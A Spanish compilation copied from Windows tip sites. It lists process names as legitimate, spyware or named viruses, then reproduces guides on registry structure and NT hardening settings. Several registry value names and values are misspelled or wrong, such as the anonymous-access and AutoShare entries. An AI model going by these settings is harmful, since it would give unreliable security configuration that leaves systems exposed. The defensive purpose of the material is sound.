rnaapp.exe Remote Access Parte de Windows, se carga mientras dura la conexión con modem
RNAthChk.exe Real Networks update Parte de RealOne Player. No necesario.
RNDAL.exe Dynamic Application Launcher Parte de RealOne Player, mira si hay actualizaciones
rpcss.exe Remote Procedure Call Parte de Windows, más información aquí
RRAM.exe Release RAM Release RAM, libera memoria, no hace nada util (ver esta página)
rscmpt.exe Emulador de RAM para Geforce MX Simula 64 Mb en tarjetas con 32 Mb, ralentiza mucho el sistema
rsrcmtr.exe Medidor de recursos Parte de Windows
rtvscan.exe Real Time Virus Scan service Parte de Norton Anti-Virus 7.x para Windows NT/2000
RuLaunch.exe McAfee InstantUpdate Parte de McAfee VirusScan y Firewall
Run_cd.exe Virus Virus GHOST.23
Runapp32.exe Virus Virus NEODURK
rundli32.exe Virus Virus LADE
RunDll16.exe RDLL Virus SDBOT.F
rundll32.exe Windows RUNDLL32 Helper Parte de Windows, aunque no debería estar cargada permanentemente
RxMon.exe Roxio Audio Central Parte de Roxio EasyCD Creator 6.0, no necesario
savenow.exe Advertising spyware / Virus Ver información aquí. Virus SPREDA.B
Scam32.exe Virus Virus SIRCAM
ScardSvr.exe Smart Card Sólo necesario si usamos un dispositivo de este tipo
ScrSvr.exe Virus Virus OPASOFT.A
ScsiAccess.EXE * Alcohol 120% Software. Virtual SCSI controller Controladora virtual SCSI. Necesario si usamos este software
sentry.exe IP Insight Tracking software Envía información sobre nuestra ubicación y uso de Internet
Server.exe Virus Virus OPTIX.04.A, SMOKODOOR, DELTAD.A o EASYSERV
server.exe * Pinnacle STUDIO PCTV Servicio de Pinnacle PCTV
services.exe * Services Control Manager Servicio de Windows, arranca y para los servicios
SETI@home.exe Setiathome client Analiza señales captadas por radiotelescopios
sgmain.exe SpywareGuard Parte de este anti-spyware
Shell32.exe Virus Virus BADSECTOR
shellexpl.exe Virus Virus Gpix. Más información aquí, aquí y aquí
shost.exe Virus Virus YODO
showbehind.exe Adware / Spyware Viene con varios programas gratuitos, muestra publicidad
Ska.exe Virus Virus NETBUS
skinkers.exe Howard the Weatherman desktop client Muestra publicidad. Más información aquí
smartctr.exe Lotus SmartCenter Consume demasiado y no hace nada útil
smss.exe * Session Manager SubSystem Parte de Windows
sndrec32.exe Grabadora de sonidos Parte de Windows
sndvol32.exe Control de volumen Parte de Windows
snmp.exe * Microsoft SNMP Agent Parte de Windows, reenvía paquetes SNMP a la red adecuada
sp.exe Adware - troyano Redirecciona la pagina de inicio
spoler.exe Virus Virus RANDEX.J
spool32.exe Printer Spooler Parte de Windows. Gestiona la cola de impresión
spoolss.exe Printer Spooler Subsystem Parte de Windows. Gestiona la cola de impresión
spoolsv.exe * Printer Spooler Service Parte de Windows. Gestiona la cola de impresión
Sp00lsv.exe Virus Virus GRAYBIRD.E
SpySweeper.exe * Spy Sweeper Agente de Spy Swweper, proteccion anti troyanos, guanos, etc aplicacion
spywareguard.exe Advertising Spyware Ver información aquí y herramienta para eliminarlo aquí
ssdpsrv.exe Simple Service Discovery Protocol Parte de Windows (Universal Plug and Play)
starter.exe Ensoniq Mixer Tray icon No hace nada realmente útil
statemgr.exe System Restore Parte de Windows
Stimon.exe Still Image Monitor Necesario para el funcionamiento de escáneres y cámaras digitales
stisvc.exe Still Image Service Parte de Windows,
stub.exe Kazaa/Ezula/TopText Scumware Ver información aquí
StyleXP.exe StyleXP Permite cambiar la apariencia de Windows
slvchost32.exe Worm - Virus slvchost32.exe
svchosl.exe Virus Virus GAOBOT.P
svchost.exe * Service Host Process Parte de Windows. Agrupa varios servicios. Ver Q250320
svchosts.exe Virus Virus SDBOT
svch0st.exe Virus Virus GRAYBIRD
svxhost.exe Worm - Virus svxhost.exe
swoff.exe Switch Off Permite programar el apagado, desconexión y más cosas
Synchost.exe Remote Access Slave Virus RIPJAC
syntpenh.exe Enhaced Touchpad Añade funcionalidad al touchpad
syntplpr.exe Synaptics Touchpad Añade funcionalidad al touchpad
sysconf.exe Virus Virus SDBOT
sysldr32.exe Virus Virus GAOBOT
sysreg.exe Spyware / hijackware Cambia la configuración del Internet Explorer, muestra publicidad
system.exe Virus Virus CHILI, NULLBOT, FULAMER.25 o GATECRASH.A
System32.exe Virus Virus KWBOT.C, MARI o SYSXXX
systray.exe System Tray Parte de Windows (iconos en la parte derecha de la barra de tareas)
systray32.exe Virus Virus DABOOM
tapisrv.exe TAPI Service Parte de Windows (soporte para telefonía)
taskmgr.exe * Administrador de tareas Parte de Windows, es el propio Administrador de tareas
taskmon.exe Windows Task Optimizer Parte de Windows, no necesario
TaskTray.exe Spyware Ver más información aquí
tca.exe The Cleaner Parte de este antivirus
tcaudiag.exe Diagnostic program for 3COM NIC No hace nada realmente útil
tcpsvcs.exe * TCP/IP Services Application Microsoft Windows Operating System
teekids.exe Virus Virus BLASTER.C
TFncKy Toshiba Controls Se carga para que funcionen los botones extra en portátiles Toshiba
THotkey.exe Toshiba Hotkey Utility Necesario para que funcionen algunas combinaciones de teclas en portátiles
Toshibsu.exe Toshiba Power Control Necesario pata las funciones de ahorro de energía
TosHKCW.exe Wireless Hotkey Utilidad usada en portátiles Toshiba
TouchED.Exe TouchPad Controls Añade funcionalidad al touchpad en portátiles Toshiba
trillian.exe Trillian Programa de mensajería instantánea
tsyssmon.exe System Monitor Monitoriza el funcionamiento del sistema en portátiles Toshiba
tsystray.exe Real Jukebox Systray Icono de RealJukebox, no necesario
ttps.exe Spyware / hijackware Cambia la página de búsqueda del Internet Explorer, muestra publicidad
Tweak-xp.exe Tweak-XP Permite cambiar varias configuraciones de Windows XP
ud.exe United Devices Agent Colabora en un proyecto de computación distribuida
umxagent.exe Tiny Personal Firewall Parte de esta firewall
updreg.exe SoundBlaster Live! Reminder No hace nada realmente útil
userinit.exe UserInit Process Parte de Windows, ejecuta scripts de logon
vbptask.exe RestoreIT! Parte de FarStone RestoreIT!
Virus_Cleaner.exe Virus Virus PANOL
visio.exe Microsoft Visio Programa para hacer esquemas
Vision.exe * Pinnacle STUDIO PCTV Componente de Pinnacle PCTV
vmnat.exe VMware NAT Parte de VMware
vmnetdhcp.exe VMware DHCP Parte de VMware
vmware.exe VMware VMware
vmware-vmx.exe VMware Virtual Machine Máquina virtual ejecutándose
vpnservices.exe Symantec VPN Client No necesario si no se usa este software en particular
vptray.exe Norton AntiVirus Parte de Norton AntiVirus
vshwin32.exe * McAfee VirusScan Parte de McAfee VirusScan
vsmon.exe * True Vector Internet Monitor Parte de ZoneAlarm
vssvc.exe Volume Shadow Copy Parte de Windows 2003 server
VSStat.exe * VirusScan MSC Parte de McAfee VirusScan
wab.exe Libreta de direcciones Parte de Windows
wanobsi.exe Adware Modifica la página de búsqueda del Internet Explorer
washer.exe Windows Washer Elimina ficheros temporales, cookies, historial, etc
wbload.exe WindowBlinds Permite cambiar la apariencia de Windows
webscanx.exe McAfee VirusScan Parte de McAfee VirusScan
win32_i.exe Advertising Spyware Ver información aquí y herramienta para eliminarlo aquí
win32API.exe Homepage hijacker Cambia la página de inicio del Internet Explorer, ver aquí
win32us.exe Dialer All-In-One Telcom Se conecta con webs pornográficas, más información aquí
winadm.exe Parents Friend Permite controlar el horario de uso y proteger programas con una clave
winamp.exe * Winamp Winamp
Winampa.exe * Winamp Agent Parte de Winamp, no necesario
WINANMPX.EXE Worm Gusano de internet
Wincfg32.exe Virus Virus SILVERFTP
wincomp.exe Troyano Más información aquí
windex.exe Virus Virus GAOBOT.BM
windfind.exe Dialer Más información aquí
Windll.exe Virus Virus TRYNOMA o STEALER
Windll32.exe Virus Virus MSNPWS, ASTEF o RESPAN
Windows.exe Virus Virus QQPASS.E, KAZMOR, BOBBINS o ALADINZ.D
winhelp.exe Virus Virus LOVGATE.G
winhlp32.exe Windows Help File viewer Parte de Windows
winhlpp32.exe Virus Virus wW32/Gaobot.FT
winkrnl386.exe Virus Virus ZEBROXY
Winmgm32.exe Virus Virus SOBIG o LALA.C
Wininit.exe Virus Virus BYMER
winlogin.exe Virus Virus RANDEX.E
winlogon.exe * Windows Logon Process Parte de Windows, se encarga de iniciar y cerrar las sesiones
winmgmt.exe Windows Management Service Parte de Windows, aunque no es normal que esté activo
winnet.exe CommonName Toolbar Uno de los peores spywares, se instala con imesh. Ver esta página.
winproj.exe Microsoft Project Microsoft Project
WinProxy.exe WinProxy Proxy / Firewall
winrecon.exe WinRecon Monitoriza y registra todo lo que se hace en el PC
winroute.exe WinRoute WinRoute (Firewall / Router)
winserv.exe Adware / Spyware / Virus Parte de Intelligent Explorer, instala BargainBuddy/Apuc o EVILBOT.C o IMISERV
WinServices.exe Virus Virus YAHA.K o YAHA.M
winservn.exe Adware / Spyware Spyware PurityScan
Winsys32.exe Virus Virus CIGIVIP o RECKUS
winsystem.exe Virus Virus WHITEBAIT
Wintask.exe Virus Virus HIPO, NAVIDAD o LEMIR.F
winupdate.exe Virus Virus BMBOT o RADO
WinVNC.exe WinVNC Software de control remoto
winword.exe * Microsoft Word Parte de Microsoft Office
winz32.exe Virus Virus KWBOT.Z o SDBOT.Q
winzip32.exe * Winzip WinZip
WISPTIS.EXE * Microsoft Tablet PC Platform Component Microsoft Windows Operating System
wkcalrem.exe Microsoft Works Calendar Reminder Parte de Microsoft Works
WkDetect.exe MS Works Update Parte de Microsoft Works, no necesario para que funcione
WkUFind.exe Microsoft Works Update Detection Parte de Microsoft Works, no necesario para que funcione
wmexe.exe WinModem drivers WinModem drivers
wmiapsrv.exe * Servicio de rendimiento de adaptador de WMI Sistema operativo Microsoft Windows
wmiexe.exe IEEE 1394 device detector Necesario en Windows Me para trabajar con dispositivos firewire
wmplayer.exe Windows Media Player Parte de Windows
wnad.exe Adware / Spyware Muestra publicidad. Ver más información aquí
wordpad.exe * Wordpad Parte de Windows
wowexec.exe Windows On Windows Execution Parte de Windows, para ejecutar aplicaciones de 16 bits
wpwin8.exe WordPerfect 8 Corel WordPerfect for Windows 8
wsys.exe Virus Virus MANIFEST
wupdated.exe Virus Virus MOEGA
wupdt.exe Adware / Spyware Parte de Intelligent Explorer, instala BargainBuddy/Apuc, Virus IMISERV
wwasher.exe WebWasher Filtra publicidad en Internet Explorer
wzqkpick.exe WinZip QuickPick Icono de Winzip en la barra de tareas, consumo innecesario
xadbrk.exe AdBreak advertising spyware Ver información aquí
XupiterStartup.exe Xupiter Ver información aquí, aquí y aquí
ypager.exe Yahoo! Pager Servicio de Yahoo Messenger
zapro.exe * ZoneAlarm Pro Firewall ZoneAlarm Pro
zonealarm.exe * ZoneAlarm Firewall ZoneAlarm
zclient.exe * ZoneAlarm Pro 4.5 Firewall ZoneAlarm

(tomado de trucoswindows.net)

El registro de Windows

Copio tres guías interesantes que he encontrado en la web sobre el registro de windows (están separadas por una línea de asteriscos):

- EL REGISTRO
El registro es la mayor base de datos q existe en una maquina correindo bajo Win para ingresar a ella de una forma rapida tan solo basta con teclear INICIO/EJECUTAR/REGEDIT.EXE y ya estamos adentro
Esta centralizada a toda la configuracion de la maquina en ella se guarda todo tipo de informacion tanto de los programas como del SO en si .
Aprender a manejar configurar y toketear el regedir de win nos ayudara a personalizar gran parte de nuestro win ... asi como tb da el caso de poder violar la seguridad del sistema con diferentes tecnicas incluyendo el crakeo de ciertas aplicaciones
En esta parte del articulo me centrare sobre el registro de NT/ W2K
Tenemos q tener en cuenta una cosa todos los win$ tienen parecido a ello,la unica direfencia sobre aquellos q conocen el registro del recordado WIN95 q los WinNT ni el W2k no utilizan una sub estrctura HKEY_DYN_DATA.

ESTRUCTURA
EL regedit del NT esta divido en partes la llamaremos sub-estructuras

HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG

Sub-Estructuras del Regitro

HKEY_CLASSES_ROOT
-------------------------------------------------------
En esta sub estructura se mantienen una lista extensa asi como tb las extensiones de la mayoria de los archivos q se encuantran enlazados a algun tipo de aplicacion.En ella tb encontramos informacion sobre las operaciones (OBJECT LINKING AND EMMENDDING) OLE.dentro de esta sub estructura se puede definir la extensión *.cualquiera (ojo no tocar si no sabemos q estamos haciendo) esta tb para aquellos q de una manera simpatica le gusta jugar con las extensiones de ciertos ficheros un buen ejemplo es de cambiarlo los documentos de textos a extensiones *.exe o viceversa baaaa win tiene en el regedit exteciones para todos los colores y sabores .

HKEY_CURRENT_USER
--------------------------------------------------------
En este sub directorio por asi llamarlo se centra en la configuracion del escritorio en el cual estamos trabajando asi como tb sobre los programas el entorno de la maquina

Existen y tienen ciertas aplicaciones y estan difrenciadas en 7 sub claves nuevamente

-Applevents= Aqui se encuentra la configuracion del sonido de nuestro Win
-Console=Configuracion de la consola del DOS q vendria a ser la famosa Shell en entornos Linux
-Control Panel=sub directorio donde se almacena la configuracion asi como tb la info sobre los dispositivos de entrada y salida de nuestro sitema a la par de varios elementos de nuestro panel de control
-Identies=Aqui se encuentra infomarcion sobre el usuario actual q posee una cantidad X de programas
-Software=Informacion sobre los programas q tenemos instalados
-Enviroment=Ruta q corre sobre los directorios de los archivos temporales
-System= info del sistema en la sesion donde se encuentra el usuario

HKEY_LOCAL_MACHINE
--------------------------------------------------------
Quizas en esta sub estrctura a la q mas importacia se le da sobre el registro,nos brinda informacion sobre las aplicaciones,las configuraciones del sistema de hardware etc,etc vomos a nombrarlos segun el orden q tenemos en nuetro registro

-HKEY_LOCAL_MACHINE\HARDWARE=Aqui se encuentra almacenada toda la info q soporta nuestra maquina incluyendo los driver del sistema asi como tb los componentes

-HKEY_LOCAL_MACHINE\SAM= Aqui se guardan la informacion acerca del usuario del sistema asi como tb los pass (*.sam)


-HKEY_LOCAL_MACHINE\SECURITY= Se centra en la informacion q tienen los usuarios en cuanto a privilegios


-HKEY_LOCAL_MACHINE\SOFTWARE= Info sobre los programas q tenemos instalados


-HKEY_LOCAL_MACHINE\SYSTEM= Sub directorio donde se almacena informacion impresindible para q win NT arranque el sistema

HKEY_USERS
--------------------------------------------------------

casi los mismo q el sub directorio del regitro HKEY_CURRENT_USER pero con una particularidad q tiene una sub estrcura para cada usuario especifico del sistema

HKEY_CURRENT_CONFIG
--------------------------------------------------------
Aqui se guarda informacion sobre lo q seria la configuracion actual de distintos dispositivos de nuestro sistema asi como tb las propiedades de Internet etc.

EN una cierta forma hemos visto a grandes rasgos los componentes del registro de win asi como tb los sub directorios (sub-claves) y de la importacia de manejar y trabajar con el registro asi como tb cabe recalcar q ningun asuario deberia de tener acceso al registro tanto de forma remota asi como tb local con la ecepcion de poder trabajar y tocar el registro siendo administrador de nuestro sistema o nuestra red ya q implica un problema de seguridad muy importante `para lo q estariamos expuestos asi como tb la gran mayoria de los administradores,existen muchos soft para impedir el toqueteo tanto del registro de nuestro sistema asi como tb muchas otras aplicaciones una persona q ingresara a este y por ente no tendria intenciones muy buenas q digamos trataria de configurar cambiar las rutas de accesos de ciertos programas o tal vez modificar un monton de cosas para q luego nuetra red sea un caos y salga beneficiado de alguna manera ya sea el proposito q sea.


Trabajando con el Registry
Configuraciones de Seguridad para nuestro sistema
--------------------------------------------------------
En la sigueinte lista expondre algunas configuraciones del registro q los administradores de sistema podrian aplicar para q se establesca una mejor seguridad sobre el NT de Windows

En las maquinas q corren bajo NT se emplea un archivo de paginacion llamado Pagefile.sys en el cual se almacenan o se pueden almacenar datos sensitivos.Las paginas de memorias son intercambiadas los cual se denomina swaping.El archivo de paginacion no se encuantra disponible cuando el sistama se encuentra en ejecucion ... de igual manera este puede ser accedido de la manera siguiente

Pulsar el boton derecho de nuestro mouse sobre my computer e ir a la pestaña properties
Selecionar la etiqueta Performance
Luego ir a virtual Memory

A partir de aqui trabajaremos directamente con el regedit.exe
Ojo si no tenemos conociemiento alguno del regedit no toicar bajo ninguna circustancia el registro es mejor bajarnos unos manuales de la net y leer sobre asi como tb deberias de tener un bakkup tanto de nuestro sistema como de nuestro registro tb tenemos el regedit help q se encuentra en nuestro sistema C\WINNT\HELP y tenet cuidado en este ya q al hecer algun cambio o pulsando cualqier cosa con el echo de probar q pasa se nos puede ir todo a la puta y cagamos ..... sobre el final expondre algunos enlaces interesantes buscado en google.com hasta eso ahorrare de una manera ya :>)

Todo cambio al regedit debe ser reiniciado
Vamos con nuestro tema de paginacion

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\Session Manager\Memory Management
Value Name ClearPageFileAtShotdown
Type REG_DWORD
Value 1

-Proteger el acceso de manera remota
Con el registry editor podemos acceder de manera remota al registry de WinNT por motivos mas q evidentes de seguridad podemos restringir el acceso desde la red al registry se bede de utilizar el registry editor para crear la directiva siguiente

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\SecurePipeServes\Winreg
Value Name Description
Type REG_SZ
Value Registry Srver

He indicar los siguientes pasos
-Seleccionar el Winreg ,ir al menu Security e ir a continuacion a Permissions
-Se debe de establecer Los Permisos de FuLL Control para el grupo de Administrator o sea Netamente para los administradores del sistema y verificar q ningun otro grupo o usuario esten listados luego OK

Los permisos de seguridad q son establecidos con esta directiva difinen q suarios o grupo de usuarios pueden conectarse al registry de forma remota,La tipica istalacion de los Sistemas Win por defauld y en este caso en NT WOrstattion no define esta directiva asi como tampoco restringe el acceso de forma remota.La subdirectiva AllowedPaths se encuentran las directivas unificada a los miembros del grupo Everynone q tienen acceso asi como tb permite especificar las funciones dentro del sistema ejemplo verificar el estado de las impresoras para tabajar correctamente e independientemente de como esta en acceso restringido por medio de la directiva del registri winreg .

-Asegurando el Eventlog Viewing
La confuguracion por defaul pero\mite el acceso estableciendo sesiones de guest y null sessions para observar los eventos (events logs) (system y aplications).El security Log se encuetra protegido del acceso guest por defauld,es visible para los usuarios q tienen los derechos de usuarios MANAGE AUDIT LOGS . Los servicios del Visor de eventos (Event logs) utilizan las siguientes especificaciones para restringir el acceso de sesiones guest a los registro

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\EventLog\[LogName]
Value RestringGuestAccess
Type REG_DWORD
Value 1

Para q los cambios tengas sus efectos correpondientes es necesario reiniciar el sistema asi como tb se debe estabecer la seguridad en esta directiva remoiviendo el grupo Everinone y dando acceso solo y nuevamente al grupo Administrator y System para evitar cualquier acceso de algun usuario malicioso

-Asegurando las instalacoines de driver de impresora
Por motivos de seguridad y para controlar quienes pueden agragar los driver correspondientes a impresoras usando el directorio Print se utiliza la siguiente directiva del registry.En esta directiva solamente debe ser establecida a 1 para asi permitir que el SYSTEM SPOOLER restrinja la operacion solo al grupo de Administrator Y operadores de impresion (PRINT OPERATOR) en server's o POWER USERS en Wordstations

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\Print\Provinders\LanMAn PrintServices\Servers
Value AddPrinterDrivers
Type REG_DWORD
Value 1

-Removiendo los sistemas 0S\2 y POSIX
Aqui hablaremos algo de ello Posix son las siglas del Portable Operating System interface para UNIX ,este sistema es el q da soporte a las aplicaciones UNIX el fin de esta aplicacion es tratar de lograr la compatibilidad de los programas en distintos entornos UNIX es un total de un conjunto de 23 normas establecida por la IEEE,de todos estos sistemas posix NT tan solo soporta 1 la posix.1 q es un conjunto de llamadas al sistema de lenguaje C asi como tb es un sirve para llamadas cuando ineteractuan conjunta,mente conn el Executive....Aunque no hay una evidencia clara q estos sistemas son un claro riesgo de seguridad es mejor removerlos si evidentemente por algun motivo no son requeridos

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\Session Manager\SuBsystems
Value Name 022
Type REG_EXPAND_sz
Value remover Valor

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\Session Manager\SuBsystems
Value Name POSIX
Type REG_EXPAND_sz
Value remover Valor

-Previniendo Null Sessions
Un tipico de cualquier administrador despistado djar establecer una conexion de estas caracteristicas Las conexiones Null Session mas conocidas como Anonymous Logon es de una manera dejar q cierto usuario q no inicie sesion ontenga al maximo informacion de grupos,recursos compartidos de nuestra red asi como tb incluyendo dominios ETC,

Prevenir este tipo de conexiones

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\Lsa
Value Name RestricAnonymous
Type REG_DWORD
Value remover 1

-Deshabilitando el uso de LMPS

Existtiendo dos tipos de autenticacion q utiliza NT ... Uno de ellos es el LanManager (LM) q es un protocolos de autenticacion q fue utilizado originalmente por los productos de Red de la familia Microsoft q es vulnerable a ciertos atakes basados en Red El otro protocolo es de laautenticacion de NT q tiene un metodo de encriptacion y puede soportar pass con una mezcla de caracteres especiales HASH 128 bts.

Para prevenir esta autenticacion

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\Lsa
Value Name LMCompatibilityLevel
Type REG_DWORD
Value (Workstation) 3
Value (Domian Controller) 5

Este tipo de configuracion puede ser incompatible con algunas versiones de samba

http://support.microsoft.com/support\kb\articles\g147\7\06.asp

-Prevenir q los usuarios remotos Vean el Registro

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\LanManServer\Parameters
Value Name NullSessionPips
Type REG_MULTI_SZ
Value remover Aqui se puede agregar o mover los nombres de las listas segun se requiera

Ma detalles sobre esto en la page de microsoft

http://support.microsoft.com/default.aspx?scid=kd;EN-Us;q143138

-Asegurando los Archivos Compartidos

Para prevenir este tipo de ataques man in middle se deberia de habilitar el SMB signing en este tipo de caso estan 2 tratativas para inplementar el SMB signing la primera con la q trabajariamos seria del lado del workstations

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\Rdr\Parameters
Value Name RequireSecuritySignature
Type REG_DWORD
Value 1

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\Rdr\Parameters
Value Name Enable SecuritySignature
Type REG_DWORD
Value 1

La directiva siguiente son los pasos para habilitar SMB signing del lado servidor

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\LanManServer\Parameters
Value Name RequireSecuritySignature
Type REG_DWORD
Value 1

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\LanManagerServer\Parameters
Value Name EnableSecuritySignature
Type REG_DWORD
Value 1

-Protegiendo los recursos compartidos

En WinNT se crea un numero de recursos q estan ocultos y q no son visibles a traves del el buscador,pero si se puede acceder a ellos Estos recursos son conocidos como recursos compartidos administrativos y el siguente proposito del mismo es que son para realizar copias de seguridad remota pero en el caso de q no fueran necesarios es mejor desabilitarlo

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\LanManagerServer\Parameters
Value Name (Domain Controllers) : AutoshareServer
Value Name (Workstations): AutoshareWks
Type REG_DWORD
Value 1

En otro metodo para prevenir q los usuarios examinen otros equipos de Nuestra red NT workstations seria desabilitando los servicios de server y computer browser,en este caso seria buena practica para q usuarios de sistemas q no compratn nada.Si estos servicios stan desabilitados es posibe conectarse a otros dispositivos q se esten compartiendo

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\LanManagerserverValue Name Start
Type REG_DWORD
Value 3

Para q desabilitemos el computer browser

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\Browser
Value Name Start
Type REG_DWORD
Value 3

-Asegurando la Base System Objet

Para q habilitemos una fuerte proteccion en nuestra base a objetos en nustro winNT Session Manager debemos verificar o agragar si fuese necesaroi la sigiente directiva

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\SessoinManagerValue Name PortectionMode
Type REG_DWORD
Value 1

-Habilitando la Auditoria en Base a Objetos

Para q habilitemos en base a objetos debemos agregar la siguiente directiva

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\Lsa
Value Name AuditBaseObjects
Type REG_DWORD
Value 1

Debemos de notar q en esta directiva no iniciamos la creacion de una auditoria,en este caso el administrador necesita activar la auditoria para la categoria "Objett Access" desde el User Manager en esta directiva solo dice al Local Security Authority q los objetos bases deberia de ser cerados con una lista de control de auditoria en el sistema por default

-El servivio Schedule

Con el servicio Schedule (AT COMMAND) podemos ejecutar tareas automaticamente,por default solamente los administradores pueden incorporar comandos AT para asi permitir q los System Operator puedan tb incorporar comandos At se Debe de recurrit al registry editor para q creemos la siguiente directiva

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Control\Lsa
Value Name Submit Control
Type REG_DWORD
Value 1

con el acceso a la directiva anterior deberia de ser restringido solamente a los grupos q son permitidos suministrar trabajos al servicoi schedule (Administrators) usualmente

Lugar HKEY_LOCAL_MACHINE
Key \System\CurrentControlSet\Services\Schedule
Permisos Recomendados
CREATOR OWNER:Full Control
Administrator:Full Control
SYSTEM:Full Control
Everyone:Read

-Protegiendo el registry con Apropiadas ACL's

Para q obtengamos una mejor seguridad en nuestro sistema se recomienda proteger algunas directivas del Registry ya q por default estas protecciones no son establecidas a varios de los componentes del registry lo cual permite q sean hechos cambios proporcionando uan mala seguridad

EL acceso permitido al grupo EVERYONE es el siguiente

Grupo: Everyone
Permisos : QueryValue
Enumerate SubKeys
Notufy
Read Control

Para q podamos modificar los `permisos en el registry hacemos lo siguente

INICIO/EJECUTAR/REGEDT32.EXE
ingresamos al editor
Sleccionamos la directiva modificar
Seleccionamos Permission del menu Security
En el cuadro de dialogo REGISTRY KEY PERMISSIONS seleccionamos EVERYONE y modificamos los permisos

En el cuadro de dialogo HKEY_LOCAL_MACHINE on Local Machine

\Software

Se recomienda este cambio debido a q bloquea en terminos q quien puede instalar software,no es recomendable el bloqueo de todo el subarbol debido a q este puede afectar ciertos programas de funcionamiento impresindible para nuestro sistema y pueden dejar de fucionar

\Software\Microsoft\RPC (aqui incluyen todas la directivas dentro de esta)

\Software\Microsoft\Windows\CurrentVersion\Run

\Software\Microsoft\Windows\CurrentVersion\Run\RunOnce

\Software\Microsoft\Windows\CurrentVersion\Unistall

\Software\Microsoft\Windows NT\CurrentVersion

\Software\Microsoft\Windows NT\CurrentVersion\Profilelist

\Software\Microsoft\Windows NT\CurrentVersion\Aedebug

\Software\Microsoft\Windows NT\CurrentVersion\Conpatibility

\Software\Microsoft\Windows NT\CurrentVersion\Drivers

\Software\Microsoft\Windows NT\CurrentVersion\Embedding

\Software\Microsoft\Windows NT\CurrentVersion\Fonts

\Software\Microsoft\Windows NT\CurrentVersion\FontSubtitules

\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers

\Software\Microsoft\Windows NT\CurrentVersion\Font Mapper

\Software\Microsoft\Windows NT\CurrentVersion\Font Cache

\Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize

\Software\Microsoft\Windows NT\CurrentVersion\MCI

\Software\Microsoft\Windows NT\CurrentVersion\MCI Extentions

\Software\Microsoft\Windows NT\CurrentVersion\PerfLib


Es importamnte considerar mover el permiso read al grupo Everyone en esta directiva,esta permite q usuarios remotos puedan ver los datos de rendimiento de nuestro sistema sin embargo se podrian da el permiso de Read a INTERACTIVE lo cual permitiria q solamente los usuaroios q inicien sesion intectivamente accedad a esta directiva ademas de los grupos Administrator Y SYSTEM

\Software\Microsoft\Windows NT\CurrentVersion\Prt (y todas las directivas dentro de esta)

\Software\Microsoft\Windows NT\CurrentVersion\TYpe 1 istaller

\Software\Microsoft\Windows NT\CurrentVersion\WOW (y a todas las directivas dentro de estas)

\Software\Microsoft\Windows NT\CurrentVersion\Windows 3.1 MIgrationStatus (y a toda la directiva dentro de esta)

\Software\Windows 3.1 Migration Status

System\CurrentControlSet\Services\LanManServer\Shares

System\CurrentControlSet\Services\UPS

Debemos de hacer notar q ademas de las configuraciones de seguridad en esta directiva tb se reuere q el archivo Command asociadocon el servicio UPS se encuente apropiadamente asegurado permitiendo asi solamente a los Administrators:Full Control y a SYSTEM :full Control

System\CurrentControlSet\CurrentVersion\Run

System\CurrentControlSet\CurrentVersion\Run\RunOnce

System\CurrentControlSet\CurrentVersion\RunUnistall

Remueve la habilidad para escribir la subdirectiva,la configuracion por default permite a un usuario cambia la sub directiva y otorgar nivel de acceso de Administrador

En el cuadro de dialogo HKEY_CLASSES_ROOT on Local Machine

\HKEY_CLASSES_ROOT(y todas las dierctivas dentro de esta)

En el cuadro de dialogo HKEY_USERS on Local Machine

\DEFAULT


BASIC CAOS

Biografias
La Biblia de NT
Security For WINDOWS NT UNAM-CERT
Cert http://www.cert.org/
**********************************************************************





El Registro de Windows

Para ver la ayuda de El Registro de Windows ve a la carpeta WINDOWSHelp y doble clic sobre el archivo regedit.chm

El S.O. debe tener uno o varios archivos de configuración para adaptarlo a las particularidades del hardware, del software y del usuario de un equipo. Estos archivos los lee el S.O. en el arranque del sistema.

Para configurar y personalizar un terminal mediante MSDOS, utilizábamos los archivos CONFIG.SYS y AUTOEXEC.BAT, las órdenes introducidas en estos dos archivos se ejecutan al arrancar el sistema operativo permitiendo una configuración según nuestras preferencias. Podemos configurar el tipo de teclado, el ratón, el tipo de fecha, el prompt, el gestor de memoria, path, driver, tarjeta de sonido, etc....

Con Windows 3.1 se utilizaban para configurar nuestro sistema, además de los archivos anteriores, otros de extensión INI (SYSTEM.INI, WIN.INI, etc...). Incluso algunos programas cuando se instalaban creaban su propio archivo de configuración INI.

En Windows 95, Windows 98 y Windows Me la configuración del sistema se almacena en dos archivos SYSTEM.DAT y USER.DAT (entre los dos ocupan unos 4 Megas), estos se llaman el Registro de Windows. Cuando instalamos un programa (de 32 bits) éste suele modificar el Registro. Se puede prescindir del AUTOEXEC.BAT y CONFIG.SYS, así como de los archivos .INI sin embargo se mantienen por compatibilidad del sistema, sobre todo para que puedan funcionar los viejos programas de MSDOS y Windows 3.x

Con Windows XP el Registro se guarda en varios archivos, concretamente en la carpeta:
%SYSTEMROOT%System32Config se encuentran:
DEFAULT, SAM, SECURITY, SOFTWARE Y SYSTEM.

Además cada usuario tendrá un archivo llamado: %USERPROFILE%NTUSER.DAT en donde tendrá su configuración.

